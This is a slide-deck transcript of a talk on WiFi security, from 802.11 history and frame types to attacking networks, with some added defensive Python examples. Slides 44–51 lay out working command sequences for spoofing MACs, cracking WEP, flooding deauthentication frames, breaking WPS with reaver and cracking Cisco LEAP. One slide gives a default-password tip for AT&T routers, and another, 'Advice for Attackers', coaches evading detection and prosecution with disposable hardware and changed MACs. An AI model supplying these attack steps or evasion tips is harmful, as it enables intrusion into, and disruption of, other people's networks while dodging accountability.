1 of 59

The Myth of WiFi Security

by James Kegel

http://GeekBlog.TV

Twitter - @GeekBlogTV

2 of 59

Meet and Greet

James Kegel

  • WiFi Hobbyist
  • Linux Enthusiast
  • Tech Blogger

and now...

...Public Speaker!

3 of 59

In The Beginning..

  • First home computer.
    • Windows 3.1, DOS, Wolf3D, 486 w/ 'turbo' button.
  • First hack, 1 year later. "California Raisins"
    • My name is James, and I am a cheater.
  • 1996: Packet Zero Sent @ 14.4k
    • "MOM WHY DID YOU PICK UP THE PHONE?!"
    • Discovered HTML Chat Scrollers; Coolchat
  • Read "The Cathedral and the Bazaar"
    • A paper written by Eric S. Raymond
  • First taste of Linux; Redhat 4.2
    • Bought it at Sam's Club
    • Gnome was much better back then, youngsters will just have to trust me on this.
    • Mom was pissed; I was hooked.. [fdisk /mbr]

4 of 59

Fast Forward a Bit..

  • I use Debian 6 these days, but still hooked.
    • Mom's a bit more appreciative.
  • Still collecting and devouring every txt-phile in sight; PHRACK, 2600, O'Reilly
  • Still devoted to free software; sharing.
    • The information wants to be free.
  • Still on the quest to score a Gibson
    • no more raisins; switched to pineapples
    • now with 100% more ethics (Thanks, Mr. Donato)
  • Educating the public and myself, one tutorial at a time.
    • GeekBlogTV

5 of 59

Now, you go.

Take a look at your neighbors. Do you see any of the following in the crowd?

Do you fit one of these descriptions?

  • Law enforcement?
  • Merry prankster?
  • Lost pedestrian?

6 of 59

Foolish Assumptions

Since you are here, I am making a few assumptions..

YOU ARE...

  • Curious about WiFi
  • Not afraid of using the terminal
  • A rule breaker... For science!

7 of 59

Before we start...

  • These activities are fun, and educational, but outside of your own closed WiFi lab, some of them can be illegal or disruptive to nearby networks.
  • Although this presentation is meant to educate you, this information can be abused and I encourage you not to do that.
  • Any demos or example code are for "Proof of Concept" only, and should be used with consideration for your neighbors on the airwaves.

8 of 59

WiFi: A Brief History

9 of 59

Simplified Timeline

  • 1985 - FCC releases ISM (industrial, scientific & medical) band for unlicensed use.
  • 1991 - NCR Corp & ATT invent precursor to 802.11 for cash registers to use.
    • "Wavelan" 902-928 MHz - 1-2 mbits
  • 1992 - CSIRO (aus) secures patents, embarks on 20-year litigation binge, makes over $200+ Million, and more for years to come.

10 of 59

Simplified Timeline

  • 1997 - 802.11-1997, or "802.11-Legacy", debuts
  • 1999 - Wireless Ethernet Compatibility Alliance formed.
    • 2002 - WECA changed to WiFi Alliance
  • 1999 - the term "Wi-Fi" is coined by brand consultants Interbrand, who felt it was "a little catchier than IEEE 802.11b Direct Sequence."

11 of 59

Simplified Timeline

  • 2012 - Your refrigerator now has 802.11 functionality. People don't even bat an eyelash at wireless signals emanating from all types of everyday objects like:
    • television
    • cell phones
    • picture frames
    • vehicles
    • public transportation
    • local retail

12 of 59

802.11(x)-#

The lettered protocols

13 of 59

802.11a-1999

  • 54mbits/sec
  • 5GHz
  • Orthogonal Frequency Division Multiplexing
    • Helped w/ poor channel conditions
    • ADSL, WiMax, Digital TV
  • Small waves can't penetrate as well

14 of 59

802.11b-1999

  • Gained worldwide adoption in 1999
  • 11mbits/sec and slower
    • Max TCP ~6mbits/sec
    • Max UDP ~7mbits/sec
  • 2.4GHz
  • Uses CSMA/CA like Wavelan
    • Waits for a turn to speak

15 of 59

802.11g-2003

  • 2.4GHz
  • 54mbits/sec
  • Orthogonal Frequency Division Multiplexing
  • Immensely popular even before being ratified
  • Backwards compatible with 802.11b-1999
    • 'b' traffic drops entire network to 11mbit/sec

16 of 59

802.11n-2009

  • MIMO - Mult. Input, Mult. Output
    • up to 4 channels and 4 antennae
    • can use 20 & 40MHz wide channels in 2.4/5GHz bands
  • 600mbits/sec theoretical max
  • Backwards compatible with earlier 802.11x standards
  • after 11 drafts, we got 'n' approved in 2009
  • Longer range, similar to 'a'

17 of 59

802.11ac---

  • MIMO - Mult. Input, Mult. Output
    • up to 8 spatial streams
    • can use 80 & 160 MHz wide channels in 2.4/5GHz bands
  • 6.93gbits/sec theoretical max
  • Not official yet

18 of 59

WiFi Channels

19 of 59

802.11 Channels

  • Think of WiFi channels like TV channels
  • 2.4GHz Spectrum
    • Channel width - 22MHz
    • 5MHz spacing between channel centres (channel 14 sits 12MHz above channel 13)
  • Most commonly used are 1, 6, 11, 14*
    • No overlap
    • 14 only for JP
  • Susceptible to interference
    • Microwaves
    • Baby monitors

20 of 59

The 6 Modes of WiFi

21 of 59

The 6 Modes of WiFi

  • Monitor Mode
  • Master Mode
  • Managed Mode
  • Ad-Hoc Mode
  • Mesh Mode
  • Repeater Mode

22 of 59

Monitor Mode

This is juicy... More on this later

To enable:

# airmon-ng start wlan0

23 of 59

Master Mode

  • Access Point
  • Base Station
  • Router
  • ..Rogue Hardware?

24 of 59

Managed Mode

  • "Infrastructure Mode"
  • Client Devices
    • Laptop/Desktop
    • Phones
    • Game Systems

25 of 59

Ad-Hoc Mode

  • "Peer-to-Peer"
  • No need for AP or Base-station
  • Party gets bigger, convo gets slower
  • Must have same ESSID
  • May not be supported by your interface

# iw phy phy0 info | grep -A8 modes (check mode support)

26 of 59

Mesh Mode

  • "Planned ad-hoc network"
  • Also called "Mesh Cloud"
  • Nodes must have 1 common connection
  • One node goes down, signal re-routes

27 of 59

Repeater Mode

Exactly what it sounds like

Nothing to see here for us.

28 of 59

Media Access Control

29 of 59

MAC Addresses

  • Unique Identifiers for your NIC
  • Looks like "00:CA:FE:BA:BE:00"
  • Contains an Organizationally Unique Identifier (OUI)
    • First 3 octets are unique to manufacturer
      • linksys "00:04:5A"
      • netgear "00:09:5B"
  • Potentially a nail-in-the-coffin for prosecution against you as a blackhat.
  • Can get you geo-located
  • MAC Stored in hardware
    • Or is it?....
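
The OUI and the "stored in hardware, or is it?" point above can be checked in code. As an added example that is not from the talk, this Python splits a MAC into its OUI and the two flag bits of the first octet (the multicast bit and the locally-administered bit that software-assigned addresses carry), looks the OUI up in a tiny vendor table built from the two OUIs on the slide, and flags addresses a defender would want to look at twice. The vendor table, the sample addresses and the review rules are assumptions; a real deployment would load the full IEEE OUI registry.

```python
import re

# Constructed OUI table: only the two vendors named on the slide. A real deployment
# would load the full IEEE registry (oui.txt); the table here is an assumption.
OUI_TABLE = {
    "00:04:5A": "Linksys",
    "00:09:5B": "Netgear",
}


def normalize_mac(mac: str) -> str:
    """Accept 00:11:22:33:44:55, 00-11-22-33-44-55 or 001122334455 and return
    the upper-case colon form; anything that is not 12 hex digits is rejected."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac)
    if len(digits) != 12:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2)).upper()


def classify_mac(mac: str) -> dict:
    """Split a MAC into its OUI and the two flag bits carried in the first octet."""
    m = normalize_mac(mac)
    first = int(m[:2], 16)
    oui = m[:8]
    return {
        "mac": m,
        "oui": oui,
        "vendor": OUI_TABLE.get(oui, "unknown"),
        # bit 0 (I/G): 1 = group/multicast address, never a station's source MAC
        "multicast": bool(first & 0x01),
        # bit 1 (U/L): 1 = locally administered, i.e. assigned by software rather
        # than burned in by the manufacturer; MAC randomisation sets this bit
        "locally_administered": bool(first & 0x02),
    }


def review_candidates(seen: list) -> list:
    """From station MACs seen on the air, return those worth a second look:
    locally administered addresses and OUIs that are not in the vendor table."""
    flagged = []
    for mac in seen:
        info = classify_mac(mac)
        reasons = []
        if info["locally_administered"]:
            reasons.append("locally-administered bit set")
        if info["vendor"] == "unknown":
            reasons.append("OUI not in vendor table")
        if reasons:
            flagged.append((info["mac"], reasons))
    return flagged


# Constructed sample: a Linksys AP, a Netgear client, the slide's example spoof value
# and a randomised address with the U/L bit set.
SEEN = ["00:04:5a:aa:bb:cc", "00-09-5B-11-22-33", "00:11:22:33:44:55", "02:de:ad:be:ef:01"]

if __name__ == "__main__":
    for mac, why in review_candidates(SEEN):
        print(mac, "->", "; ".join(why))
```

The U/L bit is only a hint: a legitimate device with a randomised address sets it too, and a spoofed address that copies a real vendor OUI does not. It is a cheap first filter, not proof of anything.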

30 of 59

MAC Addresses Are Fun To Abuse

  • Geolocate any network device, anywhere*
  • MAC-Spoofing to gain access
  • Disposable Fingerprint
  • Impersonate/Implicate the other guy

31 of 59

SHOW ME YOUR BITS!

  • View your MAC:
    • # ifconfig | grep HWaddr
    • # macchanger -s wlan0
  • Change your MAC:
    • # ifconfig wlan0 down
    • # ifconfig wlan0 hw ether 00:11:22:33:44:55
    • # ifconfig wlan0 up

OR

    • # ifconfig wlan0 down
    • # macchanger -r wlan0
    • # ifconfig wlan0 up

32 of 59

WiFi Frames

the stuff dreams are made of..

33 of 59

WiFi Frames at a Glance

  • Similar to ethernet frames
    • Header
    • Payload
    • CRC / Integrity Check
  • Contains Useful Data
    • Source/Destination MAC
    • Control Fields
    • SSID

34 of 59

Types of WiFi Frames

  • Management Frames
  • Control Frames
  • Data Frames

35 of 59

Management Frames

  • Beacons
    • "Hey guys, this is my SSID!"
  • Probes
    • Requests
      • "Hey Linksys! I'm looking for you!"
    • Response
      • AP Says "Here is how to chat with me"
  • Associations
    • Requests
      • "Can you spare some memory?"
    • Responses
      • "Nah, I'm fresh out.."
    • Disassociating
      • "Goodbye, have a nice day, then!"

36 of 59

Management Frames cont.

  • Authentication
    • Auth Frame
      • Open Network
        • "Hey can we chat"
        • "Yeah sure"
      • WEP Network
        • "Can I get in?"
        • "What's the password?"
        • "New England Clam Chowdah"
        • *Door Opens*
    • DeAuth Frame
      • Still associated, no longer speaking
      • Impolite Goodbye

37 of 59

Control Frames

  • Request to Send "RTS"
    • "Can I send some Data Frames?"
  • Clear to Send "CTS"
    • "Yeah but you have 5 seconds"
  • Acknowledge "ACK"
    • If pass CRC
      • "Hey buddy I got your package"
    • If fail CRC
      • "Can you say that again?"

38 of 59

Data Frames

  • Contains anything.
    • Videos
    • Music
    • Content
    • 'Lost' Season 5

39 of 59

I thought this talk was about hacking WiFi?!

40 of 59

I am a carpenter, and these are my tools:

  • Assorted WiFi Adapters
    • Realtek 8187L RP-SMA
      • AWUS036H
      • X-Series G
    • Realtek 8187B Dongle
      • Belkin 54G F5D7050
  • RP-SMA Antennae
    • Yagi-Uda Array
      • 12dbi
      • 16dbi
    • Omni
      • 5dbi
      • 9dbi

41 of 59

I am a carpenter, and these are my tools:

  • Rogue Hardware
    • Pineapple MK II
    • Zipit Z2 "Noisy Cricket"
    • Evo4G Droid
  • Linux
    • Debian
    • Backtrack
    • Ubuntu
  • Software
    • Wigle WiFi (Android)
    • MDK3 (Linux)
    • AirDrop-NG / LORCon (Linux)
    • Aircrack-NG Suite (Linux)
    • Pyrit / Cowpatty / GenPMK (Linux)

42 of 59

WiFi Encryption

and Exploitation

43 of 59

WEP - Wired Equivalent Privacy

  • The most feeble WiFi encryption method.
  • Susceptible to statistical attacks from Aireplay-NG
  • The fastest WEP attacks don't need clients

Popular WEP Attacks

  • ARP-Replay
  • Frag Attack
  • ChopChop
  • -P 0841

44 of 59

Example WEP Attacks

It is implied that all attacks should start with you changing that MAC address, or using a disposable WiFi adapter.

Monitor Mode

# airmon-ng start wlan0

start monitor mode on interface wlan0

# airodump-ng -c # --bssid BSSID -w filename mon0

monitor chan # and BSSID and logs output to FILENAME with interface mon0

Fake Association

# aireplay-ng -1 0 -e SSID -a BSSID -h SPOOFMAC mon0

use your spoofed MAC to try to fake-associate with the BSSID whose network name is SSID

45 of 59

Example WEP Attacks cont.

It is implied that all attacks should start with you changing that MAC address, or using a disposable WiFi adapter.

ARP-Replay

# aireplay-ng -3 -b BSSID -h SPOOFMAC mon0

start ARP-replay attack at BSSID from SPOOFMAC on interface mon0

or

FRAG Attack

# aireplay-ng -5 -b BSSID -h SPOOFMAC mon0

or

ChopChop Attack

# aireplay-ng -4 -b BSSID -h SPOOFMAC mon0

# packetforge-ng -0 -a BSSID -h SPOOFMAC -k 255.255.255.255 -l 255.255.255.255 -y replay_dec.xor -w arp-request

# aireplay-ng -2 -r arp-request mon0

Finally, we run aircrack-ng against the captured .cap file

# aircrack-ng -b BSSID filename*.cap

46 of 59

WPA1 & WPA2 Attacks, Tkip, CCMP

  • Not as feeble as WEP
  • It is all about the handshake
  • Does not need close proximity for most of the work
  • Time-memory Tradeoff

Popular WPA1/WPA2 Attacks

  • Tkiptun-NG
  • Rainbow Tables
  • Brute Force (hear me out...)

47 of 59

How does a WPA 1/2 Attack Work?

  • DeAuthentication packets force a client to reconnect
    • MDK3
    • Airdrop-NG
    • Aireplay-NG
    • Yank the power. No, seriously, cut the power.
  • A 4-Way Handshake is recorded on-reconnect
  • Handshake is brute forced off-location
    • Aircrack-ng
    • Pyrit/Cuda/OCLHashcat/CowPatty
    • CloudCracker
  • Explain RainbowTables and TMTO and ATT Passwords.

And last bit of advice...

The password is almost always 10-Digit-Numeric; If it is a 2WIRE# or ATT#, the PW is usually the resident's home phone number. Thanks, ATT tech-support!!
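
To make "it is all about the handshake", the time-memory trade-off bullet and the ten-digit-numeric advice concrete, here is an added Python example (mine, not from the talk). It derives the PMK exactly the way a WPA/WPA2-PSK station does (PBKDF2-HMAC-SHA1, SSID as salt, 4096 iterations), shows why a PMK table precomputed for one SSID is useless against a different SSID, and estimates how long an exhaustive search of a ten-digit numeric passphrase takes against a captured handshake. The rate of 100,000 PMKs per second, the SSID "HomeNet" and the sample passphrases are assumptions for illustration; the "password"/"IEEE" pair is the known-answer test vector from the 802.11 standard.

```python
import hashlib
import math


def pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK pairwise master key (IEEE 802.11i): PBKDF2-HMAC-SHA1 over the
    passphrase, salted with the SSID, 4096 iterations, 256-bit output."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def keyspace_bits(alphabet_size: int, length: int) -> float:
    """Entropy of a passphrase drawn uniformly from alphabet_size ** length candidates."""
    return length * math.log2(alphabet_size)


def exhaustive_search_hours(alphabet_size: int, length: int, pmks_per_second: float) -> float:
    """Hours to derive every PMK in the keyspace at a given rate: the worst case for an
    offline attack on a captured handshake (the average case is half of this)."""
    return alphabet_size ** length / pmks_per_second / 3600


def passphrase_report(passphrase: str, ssid: str, pmks_per_second: float) -> dict:
    """Rough strength estimate scored by the character classes present. This assumes
    a uniformly random passphrase; a dictionary word with leetspeak substitutions
    scores high here but is far weaker, because crackers apply those substitutions
    as rules (the slide's 'LEETSPEAK IS NOT RANDOM')."""
    classes = 0
    if any(c.isdigit() for c in passphrase):
        classes += 10
    if any(c.islower() for c in passphrase):
        classes += 26
    if any(c.isupper() for c in passphrase):
        classes += 26
    if any(not c.isalnum() for c in passphrase):
        classes += 33
    return {
        "pmk": pmk(passphrase, ssid).hex(),
        "all_numeric": passphrase.isdigit(),
        "bits": keyspace_bits(classes, len(passphrase)),
        "exhaustive_hours": exhaustive_search_hours(classes, len(passphrase), pmks_per_second),
    }


# Assumed rate for illustration only; the slide gives no figure and real rates vary.
ASSUMED_RATE = 100_000.0

if __name__ == "__main__":
    # Known-answer test vector from the 802.11 standard's PSK annex.
    print("PMK(password, IEEE) =", pmk("password", "IEEE").hex())
    # Same passphrase, different SSID: an unrelated PMK. A precomputed (rainbow) PMK
    # table therefore only helps against networks that use the exact SSID it was
    # built for, which is the time-memory trade-off the slide refers to.
    print("PMK(password, linksys) =", pmk("password", "linksys").hex())
    for pw in ["5551234567", "correct horse battery staple!7Q"]:
        print(pw, passphrase_report(pw, "HomeNet", ASSUMED_RATE))
```

The numbers make the slide's point: a ten-digit numeric passphrase is a 10^10 keyspace, about 33 bits, which at the assumed rate is exhausted in roughly 28 hours, while a long passphrase drawn from all printable characters is out of reach. A non-default SSID adds nothing to the passphrase entropy, but it does force an attacker to compute every PMK afresh instead of reusing a table.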

48 of 59

DeAuthentication Expanded

  • My favorite ways to clear the air..
    • MDK3
      • mdk3 mon0 x 1 -c CLIENTMAC -t TARGETMAC
        • DeAuth one MAC Address
      • mdk3 mon0 d -b BLACKLIST
        • DeAuth MACs listed on BLACKLIST
      • mdk3 mon0 d -w WHITELIST
        • Members only, sorry.
    • Airdrop-NG
      • a/00-11-22-33-44-55|any # Allow me to connect to any
      • d/any|apple # Apple computers don't get internet today
      • d/any|any # Everyone out of the pool NOW
    • Aireplay-NG
      • aireplay-ng -0 1 -a APMAC -c TARGMAC mon0
    • Yank the power. No, seriously, cut the power.
      • Works every time. Don't cut yours too.
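
The management-frame and control-frame slides describe what beacons, probe requests, deauth frames and ACKs say, and the list above shows the deauth floods a defender has to recognise. As an added example that is not from the talk, this Python decodes the 802.11 MAC header of constructed sample frames (frame-control type and subtype, the three addresses, the deauth reason code) and flags a deauth burst and a broadcast deauth the way a simple wireless IDS rule would. The sample addresses (built from the Linksys and Netgear OUIs on the MAC slide), the threshold of five frames per second and the millisecond timestamps are assumptions; the frames are built in memory for parsing only.

```python
import struct
from collections import defaultdict

# Frame-control type/subtype names from the 802.11 MAC header definition.
TYPE_NAMES = {0: "management", 1: "control", 2: "data"}
MGMT_SUBTYPES = {0: "assoc-req", 1: "assoc-resp", 4: "probe-req", 5: "probe-resp",
                 8: "beacon", 10: "disassoc", 11: "auth", 12: "deauth"}
CTRL_SUBTYPES = {11: "rts", 12: "cts", 13: "ack"}
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text: str) -> bytes:
    return bytes(int(x, 16) for x in text.split(":"))


def parse_frame(frame: bytes) -> dict:
    """Decode the 802.11 MAC header. Frame control is a little-endian 16-bit field:
    bits 0-1 version, 2-3 type, 4-7 subtype. Control frames carry only a receiver
    address; management and data frames carry three addresses and a sequence field."""
    if len(frame) < 10:
        raise ValueError("truncated frame")
    fc, duration = struct.unpack_from("<HH", frame, 0)
    ftype = (fc >> 2) & 0x3
    subtype = (fc >> 4) & 0xF
    info = {"type": TYPE_NAMES.get(ftype, "reserved"), "subtype": subtype,
            "duration": duration, "addr1": mac_str(frame[4:10])}
    if ftype == 1:
        info["name"] = CTRL_SUBTYPES.get(subtype, f"ctrl-{subtype}")
        return info
    if len(frame) < 24:
        raise ValueError("truncated header")
    info["addr2"] = mac_str(frame[10:16])
    info["addr3"] = mac_str(frame[16:22])
    info["seq"] = struct.unpack_from("<H", frame, 22)[0] >> 4   # low 4 bits: fragment number
    if ftype == 0:
        info["name"] = MGMT_SUBTYPES.get(subtype, f"mgmt-{subtype}")
        if subtype in (10, 12) and len(frame) >= 26:        # disassoc/deauth body: reason code
            info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    else:
        info["name"] = "data"
    return info


def build_mgmt(subtype: int, dst: str, src: str, bssid: str, body: bytes = b"", seq: int = 0) -> bytes:
    """Construct a management frame in memory for the sample capture below (not transmitted)."""
    fc = (subtype << 4) | (0 << 2)
    return (struct.pack("<HH", fc, 0) + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
            + struct.pack("<H", seq << 4) + body)


def detect_deauth_flood(capture, threshold: int = 5, window_ms: int = 1000) -> list:
    """capture: list of (timestamp_ms, frame_bytes). Fires once when a sender's deauth/disassoc
    rate reaches `threshold` frames within `window_ms`, and on every deauth aimed at broadcast."""
    alerts = []
    recent = defaultdict(list)          # sender -> timestamps of its recent deauth/disassoc frames
    for ts, raw in capture:
        f = parse_frame(raw)
        if f.get("name") not in ("deauth", "disassoc"):
            continue
        sender = f["addr2"]
        if f["addr1"] == BROADCAST:
            alerts.append(("broadcast-deauth", sender, ts))
        bucket = recent[sender]
        bucket.append(ts)
        bucket[:] = [t for t in bucket if ts - t <= window_ms]
        if len(bucket) == threshold:    # fire once as the rate crosses the threshold
            alerts.append(("deauth-flood", sender, ts))
    return alerts


# Constructed sample capture: a Linksys-OUI AP and a Netgear-OUI client.
AP = "00:04:5a:aa:bb:cc"
CLIENT = "00:09:5b:11:22:33"
SAMPLE = [
    (0, build_mgmt(8, BROADCAST, AP, AP, seq=1)),                        # beacon
    (100, build_mgmt(4, BROADCAST, CLIENT, BROADCAST, seq=2)),           # probe request
    (200, build_mgmt(12, CLIENT, AP, AP, struct.pack("<H", 7), seq=3)),  # one deauth, reason 7
]
# Burst: ten deauths in half a second carrying the AP's address, then one aimed at broadcast.
SAMPLE += [(500 + 50 * i, build_mgmt(12, CLIENT, AP, AP, struct.pack("<H", 7), seq=10 + i))
           for i in range(10)]
SAMPLE.append((1200, build_mgmt(12, BROADCAST, AP, AP, struct.pack("<H", 7), seq=30)))
ACK = struct.pack("<HH", (13 << 4) | (1 << 2), 0) + mac_bytes(CLIENT)   # 10-byte control frame

if __name__ == "__main__":
    for ts, raw in SAMPLE:
        print(ts, parse_frame(raw))
    print(parse_frame(ACK))
    print(detect_deauth_flood(SAMPLE))
```

A single deauth with a sensible reason code is normal housekeeping; a burst from one address, or any deauth to the broadcast address, is what the "everyone out of the pool" tools above produce, and the sequence numbers of the flood will usually not line up with the real AP's beacons, which is a second check worth adding to a real sensor.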

49 of 59

Tkip w/ Tkiptun-NG

  • AP and Client MUST support QoS
  • AP must be configured for WPA plus TKIP
  • You MUST impersonate target MAC via MAC spoof
  • You MUST set a long keyring interval (3600s)
  • AES and high-traffic can thwart this method.

Usage

  • Packet capture ARP request/response
    • Source and destination MAC addresses are not protected by WEP or TKIP, and ARP requests are always sent to the broadcast address, so almost all of an ARP request is known plaintext. The unknown bytes are the last byte of the source IP, the last byte of the destination IP, the 8-byte MIC (message integrity check) and the 4-byte ICV checksum; the MIC and ICV make up the last 12 bytes of the plaintext.
  • Launch ChopChop to decrypt the unknown remaining bytes
  • If ChopChop doesn't guess the last bytes correctly, a MIC Failure Report frame is generated, but the TSC (TKIP Sequence Counter) is not incremented
  • Wait 60 seconds, try again.
  • Total time spent should be about 15 minutes

50 of 59

WiFi Protected Setup

  • The little password-button thingy.
  • Easiest way, by far, to break WPA1&2
  • Reaver exploits the numerical code behind that button you push when you are trying to connect to your WiFi, but can't remember the password.
  • Literally, the hardest thing about this crack is opening your beer and staying awake to watch the fireworks.
  • For Linksys, turning off WPS does not prevent this attack; DD-WRT however, doesn't support WPS.

USAGE

# airmon-ng start wlan0

# reaver -i mon0 -b TARGMAC -vv

51 of 59

Cisco LEAP Enterprise

  • Use Kismet to generate a .dump after capturing a LEAP Exchange (Cloned AP or otherwise)
  • Determine if it is a usable dump
    • # asleap -r kismet*.dump
      • if fail - "Using the passive attack method. Closing pcap..."
      • if success "Using the passive attack method. Captured LEAP exchange information"
  • If usable, pull out your dictionary
    • # asleap -r kismet*.dump -w dict.txt
  • If this fails, go get JOHN
    • Paste the username, response and challenge into a blank file in the form username:::response::challenge and save the file
    • # john --format=NETLM file.txt
  • Grab a snickers, this could take a while. Enjoy the README in the meantime http://gkbg.tv/QXa2zO

52 of 59

Meet The Attacker

53 of 59

Meet The Attacker

  • WiFi Thief
    • This is the most benign of attackers. This guy just wants to watch his movies and download obscene amounts of... files....
  • HotSpot Pervert
    • This guy will use ARP cache poisoning and the Dsniff suite to catch all of those pictures you keep sending your BF. Every Phisherman needs bait..
  • Identity Thief
    • Ever felt the need to buy a stranger everything he ever wanted and tank your credit in the same day? You are nothing but a number to this guy, and he will drain you dry without so much as a wince.
  • Corporate
    • Watch how you talk to your 'subordinates'. This should go without saying.
  • Curious
    • Probably a kid with his first copy of BackTrack and a Pringles Antenna. Nothing to see here.
  • Vandal
    • Danger, Will Robinson. This one hangs you out to dry simply "For the lulz."

54 of 59

Cover Your Butt

(attacker & victim)

55 of 59

Advice for Victims

  • Don't use your ESSID to challenge a suspected hacker.
  • Use an IPSEC VPN tunnel for extra protection.
  • Always use HTTPS when possible.
  • Lower your router TX power to the absolute minimum.
  • Use a password of all random characters and symbols. LEETSPEAK IS NOT RANDOM. Make it as long as you can remember, and use every character class if possible.
  • Always use 2-factor-authentication for every account that has it available. One vulnerable account can lead to ALL being compromised.
  • Never use the same password anywhere. (use algorithmic PW scheme if you cannot remember)
  • NEVER shop on public WiFi; if possible, never use public WiFi.
  • Don't use communal WiFi keys. Change them often.
  • If possible disable WPS or flash a custom router OS like DDWRT that doesn't support WPS.

56 of 59

Advice for Attackers

  • Do not mix 'dirty' and 'clean' WiFi adapters
  • When in doubt, change your MAC.
  • When on foreign WiFi ALWAYS assume you are being watched. NO FACEBOOK.
  • When possible, use disposable hardware
  • Do not establish patterns when wardriving
  • Maintain safe distance, use high TX power.
  • Don't brag to your stupid little friends. Everyone's just WAITING to rat you out for their get-out-of-jail-free card.
  • Don't be a creep. No CP, no bomb-threats.
  • NEVER leak personal data. No logins ever.
  • Never assume a VPN is enough. PPTP is nothing. IPSEC or you might as well be wide open.

57 of 59

Things To Remember..

  • Disabling SSID broadcasting doesn't deter hackers, plus it can give you a big headache when configuring your network and increases network traffic (probe requests and responses).
  • Don’t use WEP encryption, it’s useless.
  • WPA/WPA2-PSK encryption is still somewhat secure when using long complex mixed character passphrases.

58 of 59

Things To Remember..

  • WPA/WPA2-Enterprise encryption is even more secure if you properly set the client settings (validate the server, specify server address, don’t prompt for new servers, etc.) and assign complex passwords.
  • Try to use WPA2 (with AES/CCMP) encryption when possible with WPS disabled.
  • MAC address filtering may help control the computers or devices brought in by users, but is not a realistic deterrent against hackers.

59 of 59

(applause)